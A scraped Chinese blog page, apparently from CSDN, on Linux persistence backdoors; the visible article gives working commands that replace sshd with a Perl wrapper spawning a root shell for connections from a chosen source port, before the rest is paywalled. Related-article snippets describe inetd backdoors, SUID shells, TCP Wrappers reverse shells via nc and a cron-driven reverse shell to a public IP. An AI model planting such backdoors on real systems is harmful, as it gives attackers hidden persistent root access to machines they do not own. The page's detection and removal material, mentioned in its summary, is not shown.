linux-wrapper跟inetd服务后门

最新推荐文章于 2023-08-17 10:52:05 发布
最新推荐文章于 2023-08-17 10:52:05 发布
阅读量553 收藏 2
点赞数
分类专栏: 内网渗透 文章标签: 网络安全 信息安全 安全漏洞 云安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_34923966/article/details/114549560
版权
本文介绍了Linux系统中利用wrapper后门的实践与原理,这种后门在无连接时具有较高隐蔽性,主要通过修改sshd进程实现。同时讲解了如何检测和清除此类后门。此外,还讨论了inetd服务后门的部署和检测方法,提醒读者注意系统安全。
摘要由CSDN通过智能技术生成

wrapper后门实践

先部署后门

cd /usr/sbin/
mv sshd ../bin/

echo '#!/usr/bin/perl' >sshd
echo 'exec "/bin/sh" if(getpeername(STDIN) =~ /^..4A/);' >>sshd
echo 'exec{"/usr/bin/sshd"} "/usr/sbin/sshd",@ARGV,' >>sshd
chmod u+x sshd

/etc/init.d/sshd restart 
//或者 service sshd restart

最低0.47元/天 解锁文章
渗透测试教程
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
linux权限提升——inetd服务后门
mingyqf的博客
02-19 1230
远程后门:利用/etc/inetd.conf 我们使用vi来修改/etc/inetd.conf文件 原文件: #chargendgramudpwaitrootinternal #discardstreamtcpnowaitrootinternal #discarddgramudpwaitrootinternal #daytimestreamtcpnowaitrootinternal 修改为: #discardstreamtcpnowaitrootinternal #discarddgramudpwaitro
linux命令inetd,Linux后门的两种姿势(suid shell与inetd后门)
weixin_33736210的博客
04-29 779
前提:你现在已经是root用户, 想留一个后门以便日后再一次爆菊花。系统环境:Defaultdawg:~# uname -aLinux dawg 2.4.20-1-386 #3 Sat Mar 22 12:11:40 EST 2003 i686 GNU/Linux12dawg:~# uname -aLinuxdawg2.4.20-1-386#3 Sat Mar 22 12:11:40 EST 20...
Linux后门的两种姿势:suid shell与inetd后门
weixin_33755649的博客
03-10 215
前提:你现在已经是root用户, 想留一个后门。系统环境:dawg:~# uname -a Linux dawg 2.4.20-1-386 #3 Sat Mar 22 12:11:40 EST 2003 i686 GNU/Linux1. SUID shell首先, 先切换成为root用户,并执行以下的命令:dawg:~# cp /bin/bash /.wootdawg:~#...
操作系统权限维持(十六)之Linux系统- TCP Wrappers反弹shell后门
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
03-28 412
以ssh为例,每当有ssh的连接请求时,tcpd即会截获请求,先读取系统管理员所设置的访问控制文件,符合要求,则会把这次连接原封不动的转给真正的ssh进程,由ssh完成后续工作;TCPWrappers是一个工作在第四层(传输层)的的安全工具,对有状态连接的特定服务进行安全检测并实现访问控制,凡是包含libwrap.so库文件的的程序就可以受TCPWrappers的安全控制。当使用服务端ssh连接的时候,它开始匹配规则,然后利用spawn执行的nc反弹了一个root权限的shell。
Linux后门大全-inetd后门(一)
qq_42465440的博客
08-17 449
inetd后门介绍
react-native-charts-wrapper图表库页面布局使用案例
12-15
在React Native开发中,我们经常会遇到需要展示数据图表的需求,这时`react-native-charts-wrapper`库就显得尤为重要。这个库是专门为React Native设计的一个图表组件,支持多种图表类型,如线图、柱状图、饼图等,...
wrapper-linux-x86-64-3.5.55 社区版
最新发布
02-21
wrapper-linux-x86-64-3.5.55 社区版:Linux环境下的Java Wrapper技术详解》 在IT行业中,特别是在服务器管理和软件部署领域,Wrapper技术扮演着重要的角色。本篇将深入探讨"wrapper-linux-x86-64-3.5.55 社区版...
wrapper-linux-x86-64-3.5.32
08-31
Java Service Wrapper可以将Java程序包装成系统服务,这样就可以随着系统的运行而自动运行,本资源是linux 64位java环境下使用的wrapper资源,其他操作系统资源可以从地址:...下载
dm8-oracle-jdbc16-wrapper.jar
11-18
dm8-oracle-jdbc16-wrapper.jar
maven-wrapper-windows服务
04-22
【标题】:“maven-wrapper-windows服务” 在Java开发领域,Maven是一个不可或缺的构建工具,它简化了项目管理和依赖管理。Maven Wrapper是Maven的一个扩展,它允许开发者在没有安装Maven的情况下运行Maven命令。这...
操作系统权限维持(十五)之Linux系统-inetd远程后门
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
03-28 430
inetd.conf则是inetd的配置文件。inetd.conf文件告诉inetd监听哪些网络端口,为每个端口启动哪个服务inetd,也叫作“超级服务器”,就是监视一些网络请求的守护进程,其根据网络请求来调用相应的服务进程来处理连接请求。这样配置好了以后利用以下命令远程连接直接能拿到root用户身份。首先我们编辑该文件,向文件中写入上诉的命令。
TCP Wrapper
weixin_56669056的博客
05-26 195
TCP Wrappers概述 保护原理 保护机制的实现方式 方式1:通过tcpd程序对其他服务程序进行包装 方式2:由其他服务程序调用libwrap.so.*链接库 访问控制策略的配置文件 [root@localhost .ssh]# which ssh /usr/bin/ssh [root@localhost .ssh]# which sshd /usr/sbin/sshd [root@localhost .ssh]# ldd /usr/sbin/sshd | grep libwrap libwrap
TCP Wrapper 使用教程
moments的博客
04-03 529
TCP_Wrappers是一个工作在第四层(传输层)的的安全工具,对有状态连接 (TCP)的特定服务进行安全检测并实现访问控制,界定方式是凡是调用libwrap.so库文件的的程序就可以受TCP Wrappers的安全控制。它的主要功能就是控制谁可以访问,常见的程序有rpcbind、vsftpd、sshd,telnet。查看对应服务命令所在位置which sshd查看指定命令执行时是否调用libwrap.so文件。
ssh建立后门的两种方法
安全汪
03-07 2115
以前看到过,但是今天找了很久才找到。所以做一下截图,以备下次忘记能快速找到
后门制作及安装技术(全)
【GTA: Vice City】
08-29 4200
后门制作及安装技术摘要  本文将描述如何测定入侵者使用的方法这样的复杂内容和管理员如何防止入侵者重返的基础知识. (2002-09-16 13:30:19)后门   声明:此文为翻译文章,QiangGe只做了一些修改,并加入了一些自己的心得及自己所写的程序.  译者 iamtheguest  从早期的计算机入侵者开始,他们就努力发展能使自己重返被入侵系统的技术或后门
各类后门整理!【白帽黑客必备生存技能】
dfdhxb995397的博客
08-03 639
Unix Bash 远控后门 简介 利用 Unix/Linux 自带的 Bash 和 Crond 实现远控功能,保持反弹上线到公网机器。 利用方法 先创建 /etc/xxxx 脚本文件(名字自己改),利用该脚本进行反弹。以下脚本代表全自动反弹到 8.8.8.8 的 53 端口。 nano /etc/xxxx #!/bin/bash if netstat -ano|grep ...
Linux后门初探二(利用 /etc/inetd.conf)
d_0xff的博客
05-28 6416
这个需要一定的条件在Ubuntu 这个测试 成功Linux ubuntu 3.11.0-15-generic #25~precise1-Ubuntu SMP Thu Jan 30 17:39:31 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux这个需要的条件是开启inetd开启方式下载apt-get install openbsd-inetd直接输入dawg:~#
socat使用笔记
weixin_30559481的博客
11-11 658
ubuntu下安装:sudo apt-get install socat socat是一個netcat(nc)的替代產品,可以稱得上nc++。socat的特點就是在兩個流之間建立一個雙向的通道。socat的地址類型很 多,有ip, tcp, udp, ipv6,pipe,exec,system,open,proxy,openssl,等等。看一個例子: socat - tcp:1...
avatar-wrapper
09-19
avatar-wrapper是一个常用的前端开发术语,指的是用于包裹用户头像的封装元素或组件。在网页或应用程序中,用户头像通常需要进行一些样式的设置或处理,以便在页面上显示出来。avatar-wrapper就是为了方便处理用户...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值